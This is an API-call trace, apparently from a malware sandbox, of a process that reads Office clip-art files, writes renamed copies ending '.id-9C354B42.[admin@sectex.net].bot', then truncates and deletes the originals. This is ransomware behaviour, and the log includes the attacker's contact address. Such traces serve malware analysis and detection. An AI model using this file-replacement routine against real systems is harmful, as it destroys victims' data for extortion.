	[0162.251] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0162.251] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107480.WMF") returned 63
	[0162.251] lstrlenW (lpString=".dbf") returned 4
	[0162.251] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0162.251] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107480.WMF") returned 63
	[0162.251] lstrlenW (lpString=".1cd") returned 4
	[0162.251] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0162.251] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107480.WMF") returned 63
	[0162.251] lstrlenW (lpString=".jpg") returned 4
	[0162.251] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0162.251] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107480.WMF") returned 63
	[0162.251] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107480.WMF") returned 63
	[0162.251] lstrlenW (lpString=".doc") returned 4
	[0162.251] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0162.251] lstrlenW (lpString=".docx") returned 5
	[0162.251] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0162.251] lstrlenW (lpString=".pdf") returned 4
	[0162.251] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0162.251] lstrlenW (lpString=".xls") returned 4
	[0162.251] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0162.251] lstrlenW (lpString=".xlsx") returned 5
	[0162.251] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0162.252] lstrlenW (lpString=".ppt") returned 4
	[0162.252] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0162.252] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107480.WMF") returned 63
	[0162.252] lstrlenW (lpString=".zip") returned 4
	[0162.252] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0162.252] lstrlenW (lpString=".rar") returned 4
	[0162.252] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0162.252] lstrlenW (lpString=".bz2") returned 4
	[0162.252] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0162.252] lstrlenW (lpString=".7z") returned 3
	[0162.252] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0162.252] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107480.WMF") returned 63
	[0162.252] lstrlenW (lpString=".dbf") returned 4
	[0162.252] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0162.252] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107480.WMF") returned 63
	[0162.252] lstrlenW (lpString=".1cd") returned 4
	[0162.252] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0162.252] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107480.WMF") returned 63
	[0162.252] lstrlenW (lpString=".jpg") returned 4
	[0162.252] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0162.252] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0162.252] lstrlenW (lpString="J0107502.WMF") returned 12
	[0162.252] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107502.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107502.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0162.253] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=10836) returned 1
	[0162.253] CloseHandle (hObject=0x3f0) returned 1
	[0162.253] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107502.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107502.wmf")) returned 0x20
	[0162.253] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107502.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107502.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0162.253] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107502.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107502.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0162.253] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.253] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.253] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107502.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107502.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0162.254] GetLastError () returned 0x0
	[0162.254] ReadFile (in: hFile=0x3f0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x2a54, lpOverlapped=0x0) returned 1
	[0162.256] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x2a60, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x2a60, lpOverlapped=0x0) returned 1
	[0162.257] ReadFile (in: hFile=0x3f0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0162.257] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0162.257] SetEndOfFile (hFile=0x3c4) returned 1
	[0162.261] CloseHandle (hObject=0x3c4) returned 1
	[0162.261] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.261] SetEndOfFile (hFile=0x3f0) returned 1
	[0162.263] CloseHandle (hObject=0x3f0) returned 1
	[0162.263] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107502.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0162.263] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107502.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107502.wmf")) returned 1
	[0162.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107502.WMF") returned 63
	[0162.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107502.WMF") returned 63
	[0162.264] lstrlenW (lpString=".doc") returned 4
	[0162.264] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0162.264] lstrlenW (lpString=".docx") returned 5
	[0162.264] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0162.264] lstrlenW (lpString=".pdf") returned 4
	[0162.264] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0162.264] lstrlenW (lpString=".xls") returned 4
	[0162.264] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0162.264] lstrlenW (lpString=".xlsx") returned 5
	[0162.264] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0162.264] lstrlenW (lpString=".ppt") returned 4
	[0162.264] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0162.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107502.WMF") returned 63
	[0162.264] lstrlenW (lpString=".zip") returned 4
	[0162.264] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0162.264] lstrlenW (lpString=".rar") returned 4
	[0162.264] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0162.264] lstrlenW (lpString=".bz2") returned 4
	[0162.264] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0162.265] lstrlenW (lpString=".7z") returned 3
	[0162.265] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0162.265] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107502.WMF") returned 63
	[0162.265] lstrlenW (lpString=".dbf") returned 4
	[0162.265] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0162.265] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107502.WMF") returned 63
	[0162.265] lstrlenW (lpString=".1cd") returned 4
	[0162.265] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0162.265] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107502.WMF") returned 63
	[0162.265] lstrlenW (lpString=".jpg") returned 4
	[0162.265] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0162.265] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107502.WMF") returned 63
	[0162.265] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107502.WMF") returned 63
	[0162.265] lstrlenW (lpString=".doc") returned 4
	[0162.265] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0162.265] lstrlenW (lpString=".docx") returned 5
	[0162.265] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0162.265] lstrlenW (lpString=".pdf") returned 4
	[0162.265] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0162.265] lstrlenW (lpString=".xls") returned 4
	[0162.265] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0162.265] lstrlenW (lpString=".xlsx") returned 5
	[0162.265] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0162.265] lstrlenW (lpString=".ppt") returned 4
	[0162.265] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0162.265] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107502.WMF") returned 63
	[0162.265] lstrlenW (lpString=".zip") returned 4
	[0162.265] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0162.265] lstrlenW (lpString=".rar") returned 4
	[0162.265] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0162.265] lstrlenW (lpString=".bz2") returned 4
	[0162.266] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0162.266] lstrlenW (lpString=".7z") returned 3
	[0162.266] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0162.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107502.WMF") returned 63
	[0162.266] lstrlenW (lpString=".dbf") returned 4
	[0162.266] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0162.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107502.WMF") returned 63
	[0162.266] lstrlenW (lpString=".1cd") returned 4
	[0162.266] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0162.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107502.WMF") returned 63
	[0162.266] lstrlenW (lpString=".jpg") returned 4
	[0162.266] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0162.266] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0162.266] lstrlenW (lpString="J0107512.WMF") returned 12
	[0162.266] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107512.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107512.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0162.267] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=11404) returned 1
	[0162.267] CloseHandle (hObject=0x3f0) returned 1
	[0162.267] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107512.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107512.wmf")) returned 0x20
	[0162.267] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107512.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107512.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0162.267] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107512.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107512.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0162.267] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.267] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.268] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107512.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107512.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0162.268] GetLastError () returned 0x0
	[0162.268] ReadFile (in: hFile=0x3f0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x2c8c, lpOverlapped=0x0) returned 1
	[0162.271] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x2c90, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x2c90, lpOverlapped=0x0) returned 1
	[0162.272] ReadFile (in: hFile=0x3f0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0162.272] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0162.272] SetEndOfFile (hFile=0x3c4) returned 1
	[0162.272] CloseHandle (hObject=0x3c4) returned 1
	[0162.272] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.272] SetEndOfFile (hFile=0x3f0) returned 1
	[0162.274] CloseHandle (hObject=0x3f0) returned 1
	[0162.274] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107512.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0162.274] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107512.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107512.wmf")) returned 1
	[0162.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107512.WMF") returned 63
	[0162.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107512.WMF") returned 63
	[0162.276] lstrlenW (lpString=".doc") returned 4
	[0162.276] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0162.276] lstrlenW (lpString=".docx") returned 5
	[0162.276] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0162.276] lstrlenW (lpString=".pdf") returned 4
	[0162.276] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0162.276] lstrlenW (lpString=".xls") returned 4
	[0162.276] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0162.276] lstrlenW (lpString=".xlsx") returned 5
	[0162.276] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0162.276] lstrlenW (lpString=".ppt") returned 4
	[0162.276] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0162.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107512.WMF") returned 63
	[0162.276] lstrlenW (lpString=".zip") returned 4
	[0162.276] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0162.276] lstrlenW (lpString=".rar") returned 4
	[0162.276] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0162.276] lstrlenW (lpString=".bz2") returned 4
	[0162.276] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0162.276] lstrlenW (lpString=".7z") returned 3
	[0162.276] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0162.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107512.WMF") returned 63
	[0162.276] lstrlenW (lpString=".dbf") returned 4
	[0162.276] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0162.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107512.WMF") returned 63
	[0162.276] lstrlenW (lpString=".1cd") returned 4
	[0162.276] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0162.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107512.WMF") returned 63
	[0162.277] lstrlenW (lpString=".jpg") returned 4
	[0162.277] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0162.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107512.WMF") returned 63
	[0162.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107512.WMF") returned 63
	[0162.277] lstrlenW (lpString=".doc") returned 4
	[0162.277] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0162.277] lstrlenW (lpString=".docx") returned 5
	[0162.277] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0162.277] lstrlenW (lpString=".pdf") returned 4
	[0162.277] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0162.277] lstrlenW (lpString=".xls") returned 4
	[0162.277] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0162.277] lstrlenW (lpString=".xlsx") returned 5
	[0162.277] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0162.277] lstrlenW (lpString=".ppt") returned 4
	[0162.277] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0162.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107512.WMF") returned 63
	[0162.277] lstrlenW (lpString=".zip") returned 4
	[0162.277] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0162.277] lstrlenW (lpString=".rar") returned 4
	[0162.277] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0162.277] lstrlenW (lpString=".bz2") returned 4
	[0162.277] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0162.277] lstrlenW (lpString=".7z") returned 3
	[0162.277] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0162.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107512.WMF") returned 63
	[0162.277] lstrlenW (lpString=".dbf") returned 4
	[0162.278] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0162.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107512.WMF") returned 63
	[0162.278] lstrlenW (lpString=".1cd") returned 4
	[0162.278] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0162.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107512.WMF") returned 63
	[0162.278] lstrlenW (lpString=".jpg") returned 4
	[0162.278] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0162.278] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0162.278] lstrlenW (lpString="J0107514.WMF") returned 12
	[0162.278] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107514.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0162.531] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=12204) returned 1
	[0162.531] CloseHandle (hObject=0x3f0) returned 1
	[0162.531] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107514.wmf")) returned 0x20
	[0162.531] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107514.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.244] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107514.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0163.244] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.245] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.245] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107514.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0163.285] GetLastError () returned 0x0
	[0163.285] ReadFile (in: hFile=0x398, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x2fac, lpOverlapped=0x0) returned 1
	[0163.287] WriteFile (in: hFile=0x3e8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x2fb0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x2fb0, lpOverlapped=0x0) returned 1
	[0163.288] ReadFile (in: hFile=0x398, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.288] WriteFile (in: hFile=0x3e8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.288] SetEndOfFile (hFile=0x3e8) returned 1
	[0163.288] CloseHandle (hObject=0x3e8) returned 1
	[0163.288] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.289] SetEndOfFile (hFile=0x398) returned 1
	[0163.291] CloseHandle (hObject=0x398) returned 1
	[0163.291] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.291] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107514.wmf")) returned 1
	[0163.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF") returned 63
	[0163.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF") returned 63
	[0163.292] lstrlenW (lpString=".doc") returned 4
	[0163.292] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0163.292] lstrlenW (lpString=".docx") returned 5
	[0163.292] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0163.292] lstrlenW (lpString=".pdf") returned 4
	[0163.292] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0163.292] lstrlenW (lpString=".xls") returned 4
	[0163.292] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0163.292] lstrlenW (lpString=".xlsx") returned 5
	[0163.292] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0163.292] lstrlenW (lpString=".ppt") returned 4
	[0163.292] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0163.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF") returned 63
	[0163.292] lstrlenW (lpString=".zip") returned 4
	[0163.292] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0163.292] lstrlenW (lpString=".rar") returned 4
	[0163.292] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0163.292] lstrlenW (lpString=".bz2") returned 4
	[0163.292] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0163.293] lstrlenW (lpString=".7z") returned 3
	[0163.293] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0163.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF") returned 63
	[0163.293] lstrlenW (lpString=".dbf") returned 4
	[0163.293] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
